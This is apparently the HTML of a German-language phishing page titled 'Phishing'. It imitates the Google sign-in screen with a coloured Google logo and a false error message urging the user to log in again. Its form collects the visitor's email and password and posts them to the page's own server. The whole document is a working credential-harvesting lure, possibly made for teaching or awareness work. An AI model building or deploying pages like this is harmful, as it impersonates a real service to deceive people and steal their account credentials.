<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/css/phishing.css">
    <link rel="stylesheet" href="/css/main.css">
    <title>Phishing</title>
</head>
<body>

    <div class="center">
        <form action="" method="post">
            <div class="head">
                <h2 class="logo blue-l">G</h2>
                <h2 class="logo red-l">o</h2>
                <h2 class="logo yellow-l">o</h2>
                <h2 class="logo blue-l">g</h2>
                <h2 class="logo green-l">l</h2>
                <h2 class="logo red-l">e</h2>
            </div>
            <p id="google-error">Es ist ein Fehler aufgetreten</p>
            <div id="google-info">
                <p id="info-text"> Bitte melde dich erneut an um den Fehler zu beheben.</p>
            </div>
            <input autocomplete="off" class="google-input" type="text" placeholder="Email" name="email" id="email">
            <input autocomplete="off" class="google-input" type="password" placeholder="Passwort" name="password" id="password">
            <div id="show-pass">
                <div id="box"></div>
                <p id="small-text">Passwort anzeigen</p>
            </div>
            <div id="lower-bar">
                <p class="blue-text">Passwort vergessen?</p>
                <button type="submit" id="white-btn">Next</button>
            </div>
        </form>
        <div id="lower-links">
            <div class="lower-link-color" id="language">Deutsch <div id="arrow-down"></div></div>
            <div class="lower-link-color" id="help">Help</div>
            <div class="lower-link-color" id="privacy">Privacy</div>
            <div class="lower-link-color" id="terms">Terms</div>
        </div>
    </div>
 
</body>
</html>